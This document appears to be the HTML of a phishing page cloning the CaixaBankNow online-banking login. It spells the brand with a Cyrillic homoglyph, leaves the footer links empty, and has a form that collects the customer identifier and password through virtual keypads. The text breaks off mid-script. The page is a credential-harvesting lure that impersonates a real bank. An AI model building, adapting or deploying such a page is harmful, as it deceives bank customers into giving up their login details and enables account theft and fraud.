<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta http-equiv="Pragma" content="no-cache" />
    <meta http-equiv="Cache-Control" content="no-cache" />
    <meta http-equiv="Expires" content="-1" />
    <title>CaiхaBank | banca digital CaiхaBankNow</title>
    <link rel="shorcut icon" href="/favicon.ico" />
    <link rel="icon" href="favicon.ico" />
    <link rel="stylesheet" type="text/css" href="./css/estilos-login.css" />
    <link
      rel="stylesheet"
      type="text/css"
      href="./css/lolopo/jquery-ui-1.10.4.custom.css"
    />
    <script
      type="text/javascript"
      src="./js/arq/jQuery/jquery-1.8.3.min.js"
    ></script>
    <script
      type="text/javascript"
      src="./js/arq/jQueryUI/jquery-ui-1.9.2.custom.min.js"
    ></script>

    <script type="text/javascript">
      var a2 = "elolgnp011600.jsp";

      $(function () {
        var body_element = $("body");
        function assignTabPosition(
          focus_element,
          no_blur_element,
          previous_link
        ) {
          if (focus_element === true) {
            body_element.focus().blur();
          } else if (focus_element) {
            if (previous_link === true) {
              $(".link_ocult").remove();
            } else {
              $(focus_element).focus();
              if (no_blur_element !== true) {
                $(focus_element).blur();
              }
            }
          }
        }
        function toggleLanguageBar(button, list) {
          button.toggleClass("on");
          button.attr("aria-expanded", function (_, attr) {
            return !(attr === "true");
          });
          list.toggle();
        }

        assignTabPosition(".btn_desplegable_idioma", false, true);
        $(document).on("keyup", function (e) {
          if (e.which === 27) {
            var parentWindow = parent.window;
            parentWindow.postMessage("lolopo_escape", "*");
          }
        });
        body_element
          .on("click", "#link_accesible", function (e) {
            $(
              [
                "#linkTecladoNormal",
                "#linkTecladoNormal2",
                "#introducirTecladoVirtual2",
                "#introducirPasswordVirtual",
                "#teclado_user",
                "#accesibleEnlace",
              ].join(",")
            ).css("display", "none");
            $([".clave", ".btn-submit"].join(",")).css("margin-top", "20px");

            $(".clave")
              .find("input")
              .removeAttr("readonly")
              .removeAttr("tabindex");

            assignTabPosition(".btn_desplegable_idioma");
          })
          .on("click", "#linkTecladoNormal a", function (e) {
            e.preventDefault();

            var tmp = $(this).attr("title");
            $(this).attr("title", $(this).attr("data-back"));
            $(this).attr("data-back", tmp);
            $(this).text($(this).attr("title"));
            if ($(this).hasClass("active")) {
              $(this).removeClass("active");

              $("#teclado_user").slideUp(500, function () {
                assignTabPosition("#linkTecladoNormal a", true);
              });
            } else {
              $(this).addClass("active");

              $("#teclado_user").slideDown(500, function () {
                assignTabPosition("#ID");
              });
            }
          })
          .on("click", "#linkTecladoNormal2 a", function (e) {
            e.preventDefault();

            var tmp = $(this).attr("title");
            $(this).attr("title", $(this).attr("data-back"));
            $(this).attr("data-back", tmp);
            $(this).text($(this).attr("title"));
            var tmp1 = $(this).attr("onclick");
            $(this).attr("onclick", $(this).attr("data-back-onclick"));
            $(this).attr("data-back-onclick", tmp1);
            if ($(this).hasClass("active")) {
              $(this).removeClass("active");

              $("#introducirTecladoVirtual2").slideUp(500);
              $("#introducirPasswordVirtual").slideDown(500, function () {
                assignTabPosition("#pin1");
              });
            } else {
              $(this).addClass("active");

              $("#introducirPasswordVirtual").slideUp(500);
              $("#introducirTecladoVirtual2").slideDown(500, function () {
                assignTabPosition("#pin1");
              });
            }
          })
          .on("click", ".btn_desplegable_idioma", function (e) {
            e.preventDefault();
            var button = $(this);
            var list = $(this).next(".desplegable_idiomas");
            toggleLanguageBar(button, list);
          })
          .on("keyup", ".btn_desplegable_idioma", function (e) {
            $([".logo__Caiхa", ".logo__loterias"].join(",")).removeAttr(
              "tabindex"
            );
            if (e.which === 27) {
              e.stopPropagation();
              var button = $(this);
              var list = $(this).next(".desplegable_idiomas");
              toggleLanguageBar(button, list);
            }
          })
          .on("click", ".desplegable_idiomas a", function (e) {
            var list = $(this).closest(".desplegable_idiomas");
            var button = list.prev(".btn_desplegable_idioma");
            list.find("a").removeClass("activo");
            button.text($(this).attr("data-txt"));
            $("#idioma").val($(this).attr("data-value"));
            $(this).addClass("activo");
            toggleLanguageBar(button, list);
          })
          .on("keyup", ".desplegable_idiomas a", function (e) {
            if (e.which === 27) {
              e.stopPropagation();
              var list = $(this).closest(".desplegable_idiomas");
              var button = list.prev(".btn_desplegable_idioma");
              toggleLanguageBar(button, list);
            }
          })
          .on("blur", ".desplegable_idiomas div:last-child a", function (e) {
            var list = $(this).closest(".desplegable_idiomas");
            var button = list.prev(".btn_desplegable_idioma");
            toggleLanguageBar(button, list);
          });

        $('[rel="tooltip"]')
          .mouseover(function (e) {
            var tip = $(this).attr("title");
            $(this).attr("title", "");
            $(this).append(
              '<div id="tooltip"><div class="tipBody">' +
                tip +
                '</div><div class="tipFooter"></div></div>'
            );
            $("#tooltip").fadeIn("500");
            $("#tooltip").fadeTo("10", 1);
          })
          .mouseout(function () {
            $(this).attr("title", $(".tipBody").html());
            $(this).children("div#tooltip").remove();
          });
      });
    </script>
  </head>

  <body onload="arranque();">
    <div class="contenido_sin_frame"></div>
    <div class="login-new">
      <div class="lfloat prel">
        <a
          aria-expanded="false"
          class="ico-world escoger-idioma btn_desplegable_idioma"
          href="javascript:void(0)"
          >Castellano</a
        >
        <div class="desplegable_idiomas hide" style="">
          <div class="">
            <a
              href="#"
              title="Castellano"
              class="activo"
              data-value="Castellano"
              data-txt="Castellano"
              onclick="javascript:submit_idioma('02')"
              >Castellano</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Catal&agrave;"
              class=""
              data-value="Catal&agrave;"
              data-txt="Catal&agrave;"
              onclick="javascript:submit_idioma('01')"
              >Catal&agrave;</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Euskera"
              class=""
              data-value="Euskera"
              data-txt="Euskera"
              onclick="javascript:submit_idioma('10')"
              >Euskera</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Galego"
              class=""
              data-value="Galego"
              data-txt="Galego"
              onclick="javascript:submit_idioma('11')"
              >Galego</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Valencià"
              class=""
              data-value="Valencià"
              data-txt="Valencià"
              onclick="javascript:submit_idioma('06')"
              >Valencià</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="ceština"
              class=""
              data-value="ceština"
              data-txt="ceština"
              onclick="javascript:submit_idioma('17')"
              >ceština</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Dansk"
              class=""
              data-value="Dansk"
              data-txt="Dansk"
              onclick="javascript:submit_idioma('18')"
              >Dansk</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Deutsch"
              class=""
              data-value="Deutsch"
              data-txt="Deutsch"
              onclick="javascript:submit_idioma('05')"
              >Deutsch</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="English"
              class=""
              data-value="English"
              data-txt="English"
              onclick="javascript:submit_idioma('03')"
              >English</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Fran&ccedil;ais"
              class=""
              data-value="Fran&ccedil;ais"
              data-txt="Fran&ccedil;ais"
              onclick="javascript:submit_idioma('04')"
              >Fran&ccedil;ais</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Italiano"
              class=""
              data-value="Italiano"
              data-txt="Italiano"
              onclick="javascript:submit_idioma('13')"
              >Italiano</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Magyar"
              class=""
              data-value="Magyar"
              data-txt="Magyar"
              onclick="javascript:submit_idioma('22')"
              >Magyar</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Nederlands"
              class=""
              data-value="Nederlands"
              data-txt="Nederlands"
              onclick="javascript:submit_idioma('16')"
              >Nederlands</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Norsk"
              class=""
              data-value="Norsk"
              data-txt="Norsk"
              onclick="javascript:submit_idioma('26')"
              >Norsk</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Polski"
              class=""
              data-value="Polski"
              data-txt="Polski"
              onclick="javascript:submit_idioma('23')"
              >Polski</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Portugu&ecirc;s"
              class=""
              data-value="Portugu&ecirc;s"
              data-txt="Portugu&ecirc;s"
              onclick="javascript:submit_idioma('14')"
              >Portugu&ecirc;s</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Slovencina"
              class=""
              data-value="Slovencina"
              data-txt="Slovencina"
              onclick="javascript:submit_idioma('19')"
              >Slovencina</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Suomi"
              class=""
              data-value="Suomi"
              data-txt="Suomi"
              onclick="javascript:submit_idioma('20')"
              >Suomi</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Svenska"
              class=""
              data-value="Svenska"
              data-txt="Svenska"
              onclick="javascript:submit_idioma('15')"
              >Svenska</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Türkçe"
              class=""
              data-value="Türkçe"
              data-txt="Türkçe"
              onclick="javascript:submit_idioma('27')"
              >Türkçe</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="ελληνικά"
              class=""
              data-value="ελληνικά"
              data-txt="ελληνικά"
              onclick="javascript:submit_idioma('21')"
              >ελληνικά</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="русский"
              class=""
              data-value="русский"
              data-txt="русский"
              onclick="javascript:submit_idioma('25')"
              >русский</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="中文"
              class=""
              data-value="中文"
              data-txt="中文"
              onclick="javascript:submit_idioma('99')"
              >中文</a
            >
          </div>
        </div>
      </div>
      <div class="limpiar"></div>
      <div class="mb20 overhidden">
        <a class="dtable centrado">
          <img
            src="../imatge/lolopo/candado.png"
            alt=""
            class="dtable centrado"
          />
        </a>
        <h1 class="dtable centrado">Acceso seguro a CaiхaBankNow</h1>
      </div>
      <div class="login">
        <form action="" method="POST" id="loginForm" name="INPUTS">
          <div class="usuario prel">
            <div id="accesibleEnlace">
              <a
                href="javascript:cambiarTecladoAccesible();"
                id="link_accesible"
                title="Entrar de forma accesible"
                >Entrar de forma accesible</a
              >
            </div>
            <label for="indentificacion">Identificador</label>
            <input
              id="ID"
              name="ID"
              class=""
              type="text"
              value=""
              onkeypress="javascript:pulsaTeclaID();"
              maxlength="20"
              size="12"
              required
            />
          </div>

          <div
            id="capaErrorID"
            class="msg_error_form mt10 pd10"
            style="display: none;"
          ></div>
          <div class="pinpad-wrapper" id="teclado_user" style="display: none;">
            <div class="pinpad-component">
              <div id="destinoTecladoVirtual" class="pinpad alfanum"></div>
            </div>
          </div>
          <div class="check-field prel">
            <input
              id="recordar"
              type="checkbox"
              onkeydown="javascript:marcarCheck(event);"
              onclick=""
              value="recordar"
              name="recordar"
              title="recordar"
            />
            <label for="recordar">Guardar identificador</label>
          </div>
          <div id="linkTecladoNormal" class="rfloat teclado mt7 mb10">
            <a
              class="trigger_teclado_user link prel"
              href="javascript:void(0);"
              title="Utilizar teclado virtual"
              data-back="Ocultar teclado"
              data-back-onclick=""
              data-back-title="Ocultar teclado"
            >
              Utilizar teclado virtual
            </a>
          </div>
          <div class="limpiar"></div>
          <div id="" class="clave">
            <div style="float: left;"><label for="pin1">Contraseña</label></div>
            <div style="margin-left: 1em; float: left;">
              <a
                class="prel link"
                href="javaScript:submit_olvido();"
                title="Haz clic aquí para recuperar tu PIN1"
                >¿Has olvidado tus claves de acceso?</a
              >
            </div>
            <input
              class=""
              name="pin1"
              id="pin1"
              size="12"
              maxlength="16"
              readonly="true"
              type="password"
              required
            />
          </div>
          <div
            id="capaErrorPW"
            class="msg_error_form mt10 pd10"
            style="display: none;"
          ></div>

          <div
            class="pinpad-wrapper"
            id="introducirPasswordVirtual"
            style="display: block;"
          >
            <div class="pinpad-component">
              <span class="pinpad">
                <script>
                  if (
                    navigator["userAgent"].indexOf("iPad") > -1 ||
                    navigator["userAgent"].indexOf("iPhone") > -1
                  ) {
                    document.write(
                      "<div style='width: 500px;margin-left:110px;'><div style='width: 54px;height: 54px;overflow: hidden;display: inline-block;' onclick='javascript:pulsarImagen(0,0);javascript:comprobarInputsStyle();'></div><div style='width: 54px;height: 54px;overflow: hidden;display: inline-block;' onclick='javascript:pulsarImagen(1,0);javascript:comprobarInputsStyle();'><img style='margin-left:-54px;'  id='' src='/jsp/keypad.jsp' border='0'/></div><div style='width: 54px;height: 54px;overflow: hidden;display: inline-block;' onclick='javascript:pulsarImagen(2,0);javascript:comprobarInputsStyle();'><img style='margin-left:-108px;'  id='' src='/jsp/keypad.jsp' border='0'/></div><div style='width: 54px;height: 54px;overflow: hidden;display: inline-block;' onclick='javascript:pulsarImagen(3,0);javascript:comprobarInputsStyle();'><img style='margin-left:-162px;'  id='' src='/jsp/keypad.jsp' border='0'/></div><div style='width: 54px;height: 54px;overflow: hidden;display: inline-block;' onclick='javascript:pulsarImagen(4,0);javascript:comprobarInputsStyle();'><img style='margin-left:-216px;' id='' src='/jsp/keypad.jsp' border='0'/></div><div style='width: 54px;height: 54px;overflow: hidden;display: inline-block;' onclick='javascript:pulsarImagen(5,0);javascript:comprobarInputsStyle();'><img style='margin-left:-270px;' id='' src='/jsp/keypad.jsp' border='0'/></div></div><div style='width: 500px;margin-left:110px;'><div style='width: 54px;height: 54px;overflow: hidden;display: inline-block;' onclick='javascript:pulsarImagen(6,0);javascript:comprobarInputsStyle();'><img style='margin-left:0px;margin-top:-53px;' id='' src='/jsp/keypad.jsp' border='0'/></div><div style='width: 54px;height: 54px;overflow: hidden;display: inline-block;' onclick='javascript:pulsarImagen(7,0);javascript:comprobarInputsStyle();'><img style='margin-left:-54px;margin-top:-53px;' id='' src='/jsp/keypad.jsp' border='0'/></div><div style='width: 54px;height: 54px;overflow: hidden;display: inline-block;' onclick='javascript:pulsarImagen(8,0);javascript:comprobarInputsStyle();'><img style='margin-left:-108px;margin-top:-53px;' id='' src='/jsp/eloautp000002' border='0'/></div><div style='width: 54px;height: 54px;overflow: hidden;display: inline-block;' onclick='javascript:pulsarImagen(9,0);javascript:comprobarInputsStyle();'><img style='margin-left:-162px;margin-top:-53px;' id='' src='/jsp/keypad.jsp' border='0'/></div><div style='width: 108px;height: 54px;overflow: hidden;display: inline-block;' onclick='javascript:buttonDelPW();'><img style='margin-left:-216px;margin-top:-53px;' id='' src='/jsp/keypad.jsp' border='0'/></div></div><br>"
                    );
                  } else {
                    document.write(
                      "<map name='mapa1'><area alt='Tecla' shape='RECT' coords='0,0,50,50' href='javascript:pulsarImagen(0,0);javascript:comprobarInputsStyle();'><area alt='Tecla' shape='RECT' coords='54,0,104,50' href='javascript:pulsarImagen(1,0);javascript:comprobarInputsStyle();'><area alt='Tecla' shape='RECT' coords='108,0,158,50' href='javascript:pulsarImagen(2,0);javascript:comprobarInputsStyle();'><area alt='Tecla' shape='RECT' coords='162,0,212,50' href='javascript:pulsarImagen(3,0);javascript:comprobarInputsStyle();'><area alt='Tecla' shape='RECT' coords='216,0,266,50' href='javascript:pulsarImagen(4,0);javascript:comprobarInputsStyle();'><area alt='Tecla' shape='RECT' coords='270,0,320,50' href='javascript:pulsarImagen(5,0);javascript:comprobarInputsStyle();'><area alt='Tecla' shape='RECT' coords='0,53,50,103' href='javascript:pulsarImagen(6,0);javascript:comprobarInputsStyle();'><area alt='Tecla' shape='RECT' coords='54,53,104,103' href='javascript:pulsarImagen(7,0);javascript:comprobarInputsStyle();'><area alt='Tecla' shape='RECT' coords='108,53,158,103' href='javascript:pulsarImagen(8,0);javascript:comprobarInputsStyle();'><area alt='Tecla' shape='RECT' coords='162,53,212,103' href='javascript:pulsarImagen(9,0);javascript:comprobarInputsStyle();'><area alt='Tecla' shape='RECT' coords='216,53,320,103' href='javascript:buttonDelPW();'></map>"
                    );
                  }
                </script>
                <map name="mapa1"
                  ><area
                    alt="Tecla"
                    shape="RECT"
                    coords="0,0,50,50"
                    href="javascript:pulsarImagen(0,0);javascript:comprobarInputsStyle();" /><area
                    alt="Tecla"
                    shape="RECT"
                    coords="54,0,104,50"
                    href="javascript:pulsarImagen(1,0);javascript:comprobarInputsStyle();" /><area
                    alt="Tecla"
                    shape="RECT"
                    coords="108,0,158,50"
                    href="javascript:pulsarImagen(2,0);javascript:comprobarInputsStyle();" /><area
                    alt="Tecla"
                    shape="RECT"
                    coords="162,0,212,50"
                    href="javascript:pulsarImagen(3,0);javascript:comprobarInputsStyle();" /><area
                    alt="Tecla"
                    shape="RECT"
                    coords="216,0,266,50"
                    href="javascript:pulsarImagen(4,0);javascript:comprobarInputsStyle();" /><area
                    alt="Tecla"
                    shape="RECT"
                    coords="270,0,320,50"
                    href="javascript:pulsarImagen(5,0);javascript:comprobarInputsStyle();" /><area
                    alt="Tecla"
                    shape="RECT"
                    coords="0,53,50,103"
                    href="javascript:pulsarImagen(6,0);javascript:comprobarInputsStyle();" /><area
                    alt="Tecla"
                    shape="RECT"
                    coords="54,53,104,103"
                    href="javascript:pulsarImagen(7,0);javascript:comprobarInputsStyle();" /><area
                    alt="Tecla"
                    shape="RECT"
                    coords="108,53,158,103"
                    href="javascript:pulsarImagen(8,0);javascript:comprobarInputsStyle();" /><area
                    alt="Tecla"
                    shape="RECT"
                    coords="162,53,212,103"
                    href="javascript:pulsarImagen(9,0);javascript:comprobarInputsStyle();" /><area
                    alt="Tecla"
                    shape="RECT"
                    coords="216,53,320,103"
                    href="javascript:buttonDelPW();" /></map
                ><img
                  id="introducirPasswordVirtual"
                  src="../jsp/keypad.jsp"
                  border="0"
                  alt="Teclado"
                  name="Teclado"
                  usemap="#mapa1"
                />
              </span>
            </div>
          </div>
          <div
            class="pinpad-wrapper"
            id="introducirTecladoVirtual2"
            style="display: none;"
          >
            <div class="pinpad-component">
              <div id="destinoTecladoVirtual2" class="pinpad alfanum">
                <map name="mapa3">
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="0,0,50,50"
                    href="javascript:pulsarImagen(0,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="54,0,104,50"
                    href="javascript:pulsarImagen(1,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="108,0,158,50"
                    href="javascript:pulsarImagen(2,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="162,0,212,50"
                    href="javascript:pulsarImagen(3,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="216,0,266,50"
                    href="javascript:pulsarImagen(4,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="270,0,320,50"
                    href="javascript:pulsarImagen(5,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="324,0,374,50"
                    href="javascript:pulsarImagen(6,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="378,0,428,50"
                    href="javascript:pulsarImagen(7,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="432,0,482,50"
                    href="javascript:pulsarImagen(8,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="486,0,536,50"
                    href="javascript:pulsarImagen(9,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="0,53,50,103"
                    href="javascript:pulsarImagen(10,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="54,53,104,103"
                    href="javascript:pulsarImagen(11,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="108,53,158,103"
                    href="javascript:pulsarImagen(12,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="162,53,212,103"
                    href="javascript:pulsarImagen(13,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="216,53,266,103"
                    href="javascript:pulsarImagen(14,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="270,53,320,103"
                    href="javascript:pulsarImagen(15,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="324,53,374,103"
                    href="javascript:pulsarImagen(16,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="378,53,428,103"
                    href="javascript:pulsarImagen(17,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="432,53,482,103"
                    href="javascript:pulsarImagen(18,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="486,53,536,103"
                    href="javascript:pulsarImagen(19,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="0,106,50,156"
                    href="javascript:pulsarImagen(20,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="54,106,104,156"
                    href="javascript:pulsarImagen(21,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="108,106,158,156"
                    href="javascript:pulsarImagen(22,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="162,106,212,156"
                    href="javascript:pulsarImagen(23,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="216,106,266,156"
                    href="javascript:pulsarImagen(24,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="270,106,320,156"
                    href="javascript:pulsarImagen(25,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="324,106,374,156"
                    href="javascript:pulsarImagen(26,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="378,106,428,156"
                    href="javascript:pulsarImagen(27,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="432,106,482,156"
                    href="javascript:pulsarImagen(28,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="486,106,536,156"
                    href="javascript:pulsarImagen(29,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="0,159,50,209"
                    href="javascript:pulsarImagen(30,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="54,159,104,209"
                    href="javascript:pulsarImagen(31,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="108,159,158,209"
                    href="javascript:pulsarImagen(32,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="162,159,212,209"
                    href="javascript:pulsarImagen(33,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="216,159,266,209"
                    href="javascript:pulsarImagen(34,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="270,159,320,209"
                    href="javascript:pulsarImagen(35,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="324,159,374,209"
                    href="javascript:pulsarImagen(36,2); javascript:comprobarInputsStyle();"
                  />
                  <area
                    alt="Tecla"
                    shape="RECT"
                    coords="378,159,532,209"
                    href="javascript:buttonDelPW();"
                  />
                </map>
                <img
                  id="tecladoID3"
                  src="../jsp/keyboard.jsp"
                  alt="Teclado"
                  name="Teclado"
                  usemap="#mapa3"
                  border="0"
                />
              </div>
            </div>
          </div>

          <div id="linkTecladoNormal2" class="rfloat teclado mt7 mb10">
            <a
              href=""
              onclick=""
              class="trigger_teclado_pwd link"
              title="Mostrar teclado con letras"
              data-back="Mostrar teclado sencillo"
              data-back-onclick=""
              data-back-title="Mostrar teclado sencillo"
            >
              Mostrar teclado con letras
            </a>
          </div>
          <div class="clear"></div>
          <div class="limpiar"></div>
          <button type="submit" id="enlaceBotonAceptar" class="btn-submit">
            Entrar a CaiхaВankNow
          </button>
        </form>
        <div class="limpiar"></div>
        <ul class="links-footer">
          <li>
            <a href="#" title="Alta a CaiхaBankNow">Alta a CaiхaBankNow</a>
          </li>
          <li>
            <a href="#" title="Demostración">Demostración</a>
          </li>
          <li>
            <a href="#" title="Seguridad">Seguridad</a>
          </li>
          <li>
            <a href="#" title="CaiхaBankProtect">CaiхaBankProtect</a>
          </li>
        </ul>
      </div>
    </div>
    <div class="pie">
      <div class="superior5">
        <ul class="menu_simple">
          <li><a href="#">Aviso legal</a></li>
          <li><a href="#">Seguridad</a></li>
          <li><a href="#">Tarifas</a></li>
        </ul>
      </div>
      <div class="superior5">
        @ CaiхaBank, S.A. 2021. Todos los derechos reservados.
      </div>
    </div>
    <script src="./js/EloLgnB011000.js" type="text/javascript"></script>
    <script type="text/javascript">
      var tecladoCryp = new Array(10);
      tecladoCryp[0] = "5";
      tecladoCryp[1] = "3";
      tecladoCryp[2] = "9";
      tecladoCryp[3] = "6";
      tecladoCryp[4] = "0";
      tecladoCryp[5] = "2";
      tecladoCryp[6] = "7";
      tecladoCryp[7] = "1";
      tecladoCryp[8] = "4";
      tecladoCryp[9] = "8";
      var tecladoCrypID = new Array(37);
      tecladoCrypID[0] = "7";
      tecladoCrypID[1] = "8";
      tecladoCrypID[2] = "0";
      tecladoCrypID[3] = "4";
      tecladoCrypID[4] = "3";
      tecladoCrypID[5] = "6";
      tecladoCrypID[6] = "2";
      tecladoCrypID[7] = "9";
      tecladoCrypID[8] = "1";
      tecladoCrypID[9] = "5";
      tecladoCrypID[10] = "Q";
      tecladoCrypID[11] = "W";
      tecladoCrypID[12] = "E";
      tecladoCrypID[13] = "R";
      tecladoCrypID[14] = "T";
      tecladoCrypID[15] = "Y";
      tecladoCrypID[16] = "U";
      tecladoCrypID[17] = "I";
      tecladoCrypID[18] = "O";
      tecladoCrypID[19] = "P";
      tecladoCrypID[20] = "A";
      tecladoCrypID[21] = "S";
      tecladoCrypID[22] = "D";
      tecladoCrypID[23] = "F";
      tecladoCrypID[24] = "G";
      tecladoCrypID[25] = "H";
      tecladoCrypID[26] = "J";
      tecladoCrypID[27] = "K";
      tecladoCrypID[28] = "L";
      tecladoCrypID[29] = "Ñ";
      tecladoCrypID[30] = "Z";
      tecladoCrypID[31] = "X";
      tecladoCrypID[32] = "C";
      tecladoCrypID[33] = "V";
      tecladoCrypID[34] = "B";
      tecladoCrypID[35] = "N";
      tecladoCrypID[36] = "M";
      tecladoCrypID[37] = "";
      var tecladoCrypPass = new Array(37);
      tecladoCrypPass[0] = "4";
      tecladoCrypPass[1] = "5";
      tecladoCrypPass[2] = "3";
      tecladoCrypPass[3] = "8";
      tecladoCrypPass[4] = "1";
      tecladoCrypPass[5] = "0";
      tecladoCrypPass[6] = "9";
      tecladoCrypPass[7] = "2";
      tecladoCrypPass[8] = "6";
      tecladoCrypPass[9] = "7";
      tecladoCrypPass[10] = "Q";
      tecladoCrypPass[11] = "W";
      tecladoCrypPass[12] = "E";
      tecladoCrypPass[13] = "R";
      tecladoCrypPass[14] = "T";
      tecladoCrypPass[15] = "Y";
      tecladoCrypPass[16] = "U";
      tecladoCrypPass[17] = "I";
      tecladoCrypPass[18] = "O";
      tecladoCrypPass[19] = "P";
      tecladoCrypPass[20] = "A";
      tecladoCrypPass[21] = "S";
      tecladoCrypPass[22] = "D";
      tecladoCrypPass[23] = "F";
      tecladoCrypPass[24] = "G";
      tecladoCrypPass[25] = "H";
      tecladoCrypPass[26] = "J";
      tecladoCrypPass[27] = "K";
      tecladoCrypPass[28] = "L";
      tecladoCrypPass[29] = "Ñ";
      tecladoCrypPass[30] = "Z";
      tecladoCrypPass[31] = "X";
      tecladoCrypPass[32] = "C";
      tecladoCrypPass[33] = "V";
      tecladoCrypPass[34] = "B";
      tecladoCrypPass[35] = "N";
      tecladoCrypPass[36] = "M";
      tecladoCrypPass[37] = "";
      isW3C = document.getElementById && !document.all ? 1 : 0;
      isNS4 = document.layers ? 1 : 0;

      var identificador = getCookie("LOiden");
      var identifiAux = "";
      if (identificador == null || identificador == "") {
        identificador = "";
      } else {
        identificador = unescape(identificador);
        identifiAux = unescape(identificador);
      }
      var acept = true;
      var agt = navigator.userAgent.toLowerCase();
      var appVer = navigator.appVersion.toLowerCase();
      var is_mac = agt.indexOf("mac") != -1;
      var iePos = appVer.indexOf("msie");
      if (iePos != -1) {
        if (is_mac) {
          var iePos = agt.indexOf("msie");
          is_minor = parseFloat(
            agt.substring(iePos + 5, agt.indexOf(";", iePos))
          );
        } else
          is_minor = parseFloat(
            appVer.substring(iePos + 5, appVer.indexOf(";", iePos))
          );
        is_major = parseInt(is_minor);
      }
      var is_opera = agt.indexOf("opera") != -1;
      var is_safari =
        agt.indexOf("safari") != -1 && agt.indexOf("mac") != -1 ? true : false;
      var is_khtml = is_safari || is_konq;
      var is_konq = false;
      var kqPos = agt.indexOf("konqueror");
      if (kqPos != -1) {
        is_konq = true;
        is_minor = parseFloat(
          agt.substring(kqPos + 10, agt.indexOf(";", kqPos))
        );
        is_major = parseInt(is_minor);
      }
      var is_ie = iePos != -1 && !is_opera && !is_khtml;
      var ipoficines = "0";
      if (
